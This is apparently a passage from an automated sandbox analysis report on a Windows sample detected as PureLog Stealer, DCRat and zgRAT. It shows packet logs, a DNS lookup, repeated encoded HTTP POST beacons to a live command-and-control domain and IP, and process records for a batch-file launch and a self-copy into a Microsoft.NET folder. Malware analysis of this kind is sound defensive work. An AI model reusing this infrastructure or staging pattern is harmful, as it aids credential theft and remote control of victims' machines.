Sep 28, 2024 03:22:45.432977915 CEST	49714	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:22:45.433440924 CEST	49714	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:22:45.438194036 CEST	80	49714	37.44.238.250	192.168.2.8
Sep 28, 2024 03:22:45.779968023 CEST	49714	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:22:45.784780025 CEST	80	49714	37.44.238.250	192.168.2.8
Sep 28, 2024 03:22:46.057993889 CEST	80	49714	37.44.238.250	192.168.2.8
Sep 28, 2024 03:22:46.107743979 CEST	49714	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:22:46.191266060 CEST	80	49714	37.44.238.250	192.168.2.8
Sep 28, 2024 03:22:46.232732058 CEST	49714	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:22:46.418685913 CEST	49714	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:22:57.873480082 CEST	49715	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:22:57.878269911 CEST	80	49715	37.44.238.250	192.168.2.8
Sep 28, 2024 03:22:57.878370047 CEST	49715	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:22:57.878827095 CEST	49715	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:22:57.883546114 CEST	80	49715	37.44.238.250	192.168.2.8
Sep 28, 2024 03:22:58.233119011 CEST	49715	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:22:58.460232973 CEST	80	49715	37.44.238.250	192.168.2.8
Sep 28, 2024 03:22:58.512135983 CEST	80	49715	37.44.238.250	192.168.2.8
Sep 28, 2024 03:22:58.560918093 CEST	49715	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:22:58.706037998 CEST	80	49715	37.44.238.250	192.168.2.8
Sep 28, 2024 03:22:58.748404980 CEST	49715	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:22:58.937941074 CEST	49715	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:23:05.727730036 CEST	49717	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:23:05.732829094 CEST	80	49717	37.44.238.250	192.168.2.8
Sep 28, 2024 03:23:05.733792067 CEST	49717	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:23:05.734054089 CEST	49717	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:23:05.738910913 CEST	80	49717	37.44.238.250	192.168.2.8
Sep 28, 2024 03:23:06.092351913 CEST	49717	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:23:06.097229958 CEST	80	49717	37.44.238.250	192.168.2.8
Sep 28, 2024 03:23:06.339534044 CEST	80	49717	37.44.238.250	192.168.2.8
Sep 28, 2024 03:23:06.389074087 CEST	49717	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:23:06.467240095 CEST	80	49717	37.44.238.250	192.168.2.8
Sep 28, 2024 03:23:06.514038086 CEST	49717	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:23:07.543051004 CEST	49717	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:23:14.315644979 CEST	49718	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:23:14.320570946 CEST	80	49718	37.44.238.250	192.168.2.8
Sep 28, 2024 03:23:14.320664883 CEST	49718	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:23:14.320918083 CEST	49718	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:23:14.325670958 CEST	80	49718	37.44.238.250	192.168.2.8
Sep 28, 2024 03:23:14.670898914 CEST	49718	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:23:14.675817966 CEST	80	49718	37.44.238.250	192.168.2.8
Sep 28, 2024 03:23:14.934092045 CEST	80	49718	37.44.238.250	192.168.2.8
Sep 28, 2024 03:23:14.982975960 CEST	49718	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:23:15.063400030 CEST	80	49718	37.44.238.250	192.168.2.8
Sep 28, 2024 03:23:15.107760906 CEST	49718	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:23:15.289938927 CEST	49718	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:23:21.996108055 CEST	49719	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:23:22.001060963 CEST	80	49719	37.44.238.250	192.168.2.8
Sep 28, 2024 03:23:22.001195908 CEST	49719	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:23:22.001477957 CEST	49719	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:23:22.006201029 CEST	80	49719	37.44.238.250	192.168.2.8
Sep 28, 2024 03:23:22.362341881 CEST	49719	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:23:22.367183924 CEST	80	49719	37.44.238.250	192.168.2.8
Sep 28, 2024 03:23:22.610780001 CEST	80	49719	37.44.238.250	192.168.2.8
Sep 28, 2024 03:23:22.654697895 CEST	49719	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:23:22.740041018 CEST	80	49719	37.44.238.250	192.168.2.8
Sep 28, 2024 03:23:22.795264959 CEST	49719	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:23:22.952325106 CEST	49719	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:23:29.708034992 CEST	49722	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:23:29.713021994 CEST	80	49722	37.44.238.250	192.168.2.8
Sep 28, 2024 03:23:29.713134050 CEST	49722	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:23:29.713486910 CEST	49722	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:23:29.718379021 CEST	80	49722	37.44.238.250	192.168.2.8
Sep 28, 2024 03:23:30.061146021 CEST	49722	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:23:30.066133976 CEST	80	49722	37.44.238.250	192.168.2.8
Sep 28, 2024 03:23:51.086184025 CEST	80	49722	37.44.238.250	192.168.2.8
Sep 28, 2024 03:23:51.088999033 CEST	49722	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:23:51.095685005 CEST	49722	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:23:51.100573063 CEST	80	49722	37.44.238.250	192.168.2.8
Sep 28, 2024 03:24:03.338618994 CEST	49723	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:24:03.346267939 CEST	80	49723	37.44.238.250	192.168.2.8
Sep 28, 2024 03:24:03.346599102 CEST	49723	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:24:03.346940994 CEST	49723	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:24:03.351723909 CEST	80	49723	37.44.238.250	192.168.2.8
Sep 28, 2024 03:24:03.701952934 CEST	49723	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:24:03.710315943 CEST	80	49723	37.44.238.250	192.168.2.8
Sep 28, 2024 03:24:12.969784021 CEST	80	49723	37.44.238.250	192.168.2.8
Sep 28, 2024 03:24:13.014173031 CEST	49723	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:24:13.199932098 CEST	80	49723	37.44.238.250	192.168.2.8
Sep 28, 2024 03:24:13.248516083 CEST	49723	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:24:13.427891970 CEST	49723	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:24:20.448993921 CEST	49724	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:24:20.454015017 CEST	80	49724	37.44.238.250	192.168.2.8
Sep 28, 2024 03:24:20.455020905 CEST	49724	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:24:20.455343962 CEST	49724	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:24:20.460217953 CEST	80	49724	37.44.238.250	192.168.2.8
Sep 28, 2024 03:24:20.811254978 CEST	49724	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:24:20.816062927 CEST	80	49724	37.44.238.250	192.168.2.8
Sep 28, 2024 03:24:21.061444998 CEST	80	49724	37.44.238.250	192.168.2.8
Sep 28, 2024 03:24:21.107865095 CEST	49724	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:24:21.191694975 CEST	80	49724	37.44.238.250	192.168.2.8
Sep 28, 2024 03:24:21.232881069 CEST	49724	80	192.168.2.8	37.44.238.250
Sep 28, 2024 03:24:21.271583080 CEST	49724	80	192.168.2.8	37.44.238.250

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 28, 2024 03:22:23.970057964 CEST	53017	53	192.168.2.8	1.1.1.1
Sep 28, 2024 03:22:24.256458998 CEST	53	53017	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 28, 2024 03:22:23.970057964 CEST	192.168.2.8	1.1.1.1	0x79cf	Standard query (0)	115583cm.n9shteam2.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 28, 2024 03:22:24.256458998 CEST	1.1.1.1	192.168.2.8	0x79cf	No error (0)	115583cm.n9shteam2.top		37.44.238.250	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

115583cm.n9shteam2.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49710	37.44.238.250	80	7920	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe

Timestamp	Bytes transferred	Direction	Data
Sep 28, 2024 03:22:24.273345947 CEST	338	OUT	POST /vmTo_authDbbaseTesttrackDatalifedownloads.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 115583cm.n9shteam2.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Sep 28, 2024 03:22:24.624340057 CEST	344	OUT	Data Raw: 00 07 04 07 03 0f 01 06 05 06 02 01 02 00 01 07 00 02 05 08 02 00 03 0a 02 06 0d 0c 04 52 02 01 0d 01 05 0e 01 06 07 03 0b 01 07 07 05 0b 06 01 03 00 0c 0b 0f 03 01 06 06 00 04 03 07 07 00 00 02 01 0e 59 00 02 01 07 0f 04 0e 0e 0d 04 0b 06 06 04 Data Ascii: RY[\L~~`b`uMvuZhlaMchOsh{olYfhm]Qvdtju~V@{}rA~ry
Sep 28, 2024 03:22:24.886893988 CEST	25	IN	HTTP/1.1 100 Continue
Sep 28, 2024 03:22:25.016946077 CEST	175	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 28 Sep 2024 01:22:24 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 13 Connection: keep-alive Data Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49713	37.44.238.250	80	1384	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe

Timestamp	Bytes transferred	Direction	Data
Sep 28, 2024 03:22:37.084182024 CEST	355	OUT	POST /vmTo_authDbbaseTesttrackDatalifedownloads.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 115583cm.n9shteam2.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Sep 28, 2024 03:22:37.436346054 CEST	344	OUT	Data Raw: 00 0a 01 00 06 08 01 05 05 06 02 01 02 04 01 04 00 05 05 0c 02 00 03 08 02 02 0d 07 06 55 02 09 0e 05 04 5e 02 50 04 04 0e 51 04 00 00 0b 02 03 04 50 0c 0c 0e 03 01 07 07 05 07 00 05 07 07 5b 01 07 0e 59 06 00 07 00 0e 54 0e 07 0c 04 0d 08 05 50 Data Ascii: U^PQP[YTPUWP\L}Rkprt\_ueh\|\|j_`UhLhpxoo`[_\|p`dtAje~V@@{Cn~rq
Sep 28, 2024 03:22:37.686213970 CEST	25	IN	HTTP/1.1 100 Continue
Sep 28, 2024 03:22:37.814670086 CEST	175	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 28 Sep 2024 01:22:37 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 13 Connection: keep-alive Data Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49714	37.44.238.250	80	2616	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe

Timestamp	Bytes transferred	Direction	Data
Sep 28, 2024 03:22:45.433440924 CEST	290	OUT	POST /vmTo_authDbbaseTesttrackDatalifedownloads.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 115583cm.n9shteam2.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Sep 28, 2024 03:22:45.779968023 CEST	344	OUT	Data Raw: 00 06 04 0c 06 0c 04 02 05 06 02 01 02 0d 01 0a 00 03 05 0f 02 00 03 0e 07 01 0f 07 03 02 00 50 0e 56 07 01 00 56 03 04 0c 01 02 02 05 06 02 05 03 05 0b 0b 0c 00 06 57 04 55 03 03 04 01 05 58 05 00 0d 09 07 01 04 06 0d 00 0e 57 0c 07 0e 01 05 50 Data Ascii: PVVWUXWP\L~~p__cbnYb\S\|lr]wlcX~cZll\|^xNrKmpAtd`}e~V@zmv~ri
Sep 28, 2024 03:22:46.057993889 CEST	25	IN	HTTP/1.1 100 Continue
Sep 28, 2024 03:22:46.191266060 CEST	175	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 28 Sep 2024 01:22:45 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 13 Connection: keep-alive Data Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49715	37.44.238.250	80	5760	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe

Timestamp	Bytes transferred	Direction	Data
Sep 28, 2024 03:22:57.878827095 CEST	355	OUT	POST /vmTo_authDbbaseTesttrackDatalifedownloads.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 115583cm.n9shteam2.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Sep 28, 2024 03:22:58.233119011 CEST	344	OUT	Data Raw: 00 0b 04 0d 03 0b 01 02 05 06 02 01 02 0d 01 02 00 03 05 09 02 00 03 0d 03 0e 0e 07 06 52 01 50 0f 03 05 0f 03 02 04 05 0f 06 02 03 04 0b 05 06 05 00 0e 00 0f 01 07 0b 07 57 07 01 01 00 00 0f 02 07 0d 0a 07 00 05 01 0c 07 0b 0e 0c 00 0e 54 05 02 Data Ascii: RPWT_Q\L~NpaZcbqwvhRT\wlsX\|kYy\|xY}X\|~oQtgx}_~V@xmvN~re
Sep 28, 2024 03:22:58.512135983 CEST	25	IN	HTTP/1.1 100 Continue
Sep 28, 2024 03:22:58.706037998 CEST	175	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 28 Sep 2024 01:22:58 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 13 Connection: keep-alive Data Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49717	37.44.238.250	80	7580	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe

Timestamp	Bytes transferred	Direction	Data
Sep 28, 2024 03:23:05.734054089 CEST	338	OUT	POST /vmTo_authDbbaseTesttrackDatalifedownloads.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 115583cm.n9shteam2.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Sep 28, 2024 03:23:06.092351913 CEST	344	OUT	Data Raw: 05 05 04 0d 06 0c 04 00 05 06 02 01 02 07 01 0b 00 01 05 0f 02 06 03 01 02 04 0a 06 07 06 01 52 0a 0e 06 5d 00 03 05 07 0d 00 07 06 07 03 06 00 07 05 0c 5d 0e 01 05 03 05 00 06 06 01 04 04 00 03 03 0a 09 00 05 01 00 0b 00 0d 03 0d 06 0b 03 04 04 Data Ascii: R]]\L}R\|Nfvamb\wPhBywU\|Lh``Jolx[lcj}nlw^lie~V@Az}~}\[
Sep 28, 2024 03:23:06.339534044 CEST	25	IN	HTTP/1.1 100 Continue
Sep 28, 2024 03:23:06.467240095 CEST	175	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 28 Sep 2024 01:23:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 13 Connection: keep-alive Data Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49718	37.44.238.250	80	7780	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe

Timestamp	Bytes transferred	Direction	Data
Sep 28, 2024 03:23:14.320918083 CEST	302	OUT	POST /vmTo_authDbbaseTesttrackDatalifedownloads.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 115583cm.n9shteam2.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Sep 28, 2024 03:23:14.670898914 CEST	344	OUT	Data Raw: 05 06 01 05 06 0d 01 0b 05 06 02 01 02 0c 01 03 00 02 05 0d 02 07 03 0f 01 00 0e 00 07 0e 00 50 0d 00 04 00 02 06 04 01 0d 03 05 51 07 53 05 0f 05 03 0e 59 0e 07 07 0b 04 55 03 0d 05 02 06 0c 02 0a 0d 5d 07 53 06 07 0b 02 0f 0e 0f 51 0c 02 04 05 Data Ascii: PQSYU]SQP\L~h`Pvan]a[RkReww^hMl{B]oseZhnhAwglAie~V@x}r}LS
Sep 28, 2024 03:23:14.934092045 CEST	25	IN	HTTP/1.1 100 Continue
Sep 28, 2024 03:23:15.063400030 CEST	175	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 28 Sep 2024 01:23:14 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 13 Connection: keep-alive Data Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49719	37.44.238.250	80	5592	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe

Timestamp	Bytes transferred	Direction	Data
Sep 28, 2024 03:23:22.001477957 CEST	355	OUT	POST /vmTo_authDbbaseTesttrackDatalifedownloads.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: 115583cm.n9shteam2.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Sep 28, 2024 03:23:22.362341881 CEST	344	OUT	Data Raw: 05 05 01 01 03 08 04 06 05 06 02 01 02 02 01 04 00 03 05 0a 02 0c 03 0f 00 01 0a 07 04 53 03 07 0f 53 06 5a 00 0d 07 05 0b 0b 02 07 05 0b 06 06 07 02 0b 00 0d 04 06 56 01 0f 03 05 04 01 06 0d 03 0a 0d 01 07 04 04 51 0e 00 0f 00 0e 02 0b 05 02 05 Data Ascii: SSZVQPTR\L~k`_^waiOv[phBqw^h`pIl\|wly^\|~`Cvw`}e~V@{CvOrS
Sep 28, 2024 03:23:22.610780001 CEST	25	IN	HTTP/1.1 100 Continue
Sep 28, 2024 03:23:22.740041018 CEST	175	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 28 Sep 2024 01:23:22 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 13 Connection: keep-alive Data Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49722	37.44.238.250	80	7924	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe

Timestamp	Bytes transferred	Direction	Data
Sep 28, 2024 03:23:29.713486910 CEST	338	OUT	POST /vmTo_authDbbaseTesttrackDatalifedownloads.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 115583cm.n9shteam2.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Sep 28, 2024 03:23:30.061146021 CEST	344	OUT	Data Raw: 00 00 01 02 06 0a 04 02 05 06 02 01 02 07 01 0a 00 05 05 08 02 05 03 0d 03 05 0f 00 07 0f 02 05 0c 06 06 01 02 50 04 05 0b 03 05 0a 04 07 02 04 03 0a 0f 0d 0c 04 07 0a 04 57 05 54 06 0b 07 0b 01 0b 0f 0d 05 0e 04 09 0c 0e 0c 02 0a 07 0e 03 05 07 Data Ascii: PWTQ\L}Ph`bwrv\bep\|R[tpO~clxUcEz`y^kmhcwQ]j_~V@AzmnA}be

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49723	37.44.238.250	80	7360	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe

Timestamp	Bytes transferred	Direction	Data
Sep 28, 2024 03:24:03.346940994 CEST	302	OUT	POST /vmTo_authDbbaseTesttrackDatalifedownloads.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 115583cm.n9shteam2.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Sep 28, 2024 03:24:03.701952934 CEST	344	OUT	Data Raw: 05 01 04 03 06 09 04 05 05 06 02 01 02 04 01 0b 00 05 05 0c 02 06 03 0c 03 56 0d 50 06 54 06 08 0e 00 07 09 03 02 03 05 0c 06 07 04 07 57 04 02 07 04 0e 09 0c 57 06 06 04 0e 06 02 07 05 00 0c 02 01 0f 0b 05 52 04 54 0c 07 0e 02 0c 07 0c 55 05 57 Data Ascii: VPTWWRTUWRSV\L}U\|Yy_ca}vull[cs]\|]xlltXx`~KkThcYl~e~V@@z}n}\a
Sep 28, 2024 03:24:12.969784021 CEST	25	IN	HTTP/1.1 100 Continue
Sep 28, 2024 03:24:13.199932098 CEST	175	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 28 Sep 2024 01:24:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 13 Connection: keep-alive Data Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.8	49724	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Sep 28, 2024 03:24:20.455343962 CEST	355	OUT	POST /vmTo_authDbbaseTesttrackDatalifedownloads.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: 115583cm.n9shteam2.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Sep 28, 2024 03:24:20.811254978 CEST	344	OUT	Data Raw: 00 05 04 04 06 0e 01 06 05 06 02 01 02 03 01 01 00 07 05 09 02 07 03 01 01 0e 0d 56 07 02 03 05 0f 03 05 01 07 0c 05 03 0e 0b 06 05 06 00 07 02 06 01 0c 5e 0f 02 07 00 06 00 05 05 05 06 07 0d 02 51 0d 5d 05 03 01 02 0e 53 0e 50 0f 01 0f 03 07 02 Data Ascii: V^Q]SP\L~kp~c\}a\|l}t\|L]xKllQK{^r\|}pvd[j_~V@xSfN}L[
Sep 28, 2024 03:24:21.061444998 CEST	25	IN	HTTP/1.1 100 Continue
Sep 28, 2024 03:24:21.191694975 CEST	175	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 28 Sep 2024 01:24:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 13 Connection: keep-alive Data Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found

Target ID:	0
Start time:	21:22:07
Start date:	27/09/2024
Path:	C:\Users\user\Desktop\yQrCGtNgsf.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\yQrCGtNgsf.exe"
Imagebase:	0x270000
File size:	1'912'832 bytes
MD5 hash:	330A09824E901F7C2FB65BE086DF1493
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1437836517.0000000000272000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1535361216.00000000128EA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	21:22:16
Start date:	27/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9eKXf9oU9J.bat"
Imagebase:	0x7ff7174c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	21:22:16
Start date:	27/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	21:22:16
Start date:	27/09/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6274e0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	21:22:16
Start date:	27/09/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff7ede40000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	21:22:22
Start date:	27/09/2024
Path:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe"
Imagebase:	0x120000
File size:	1'912'832 bytes
MD5 hash:	330A09824E901F7C2FB65BE086DF1493
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe, Author: Joe 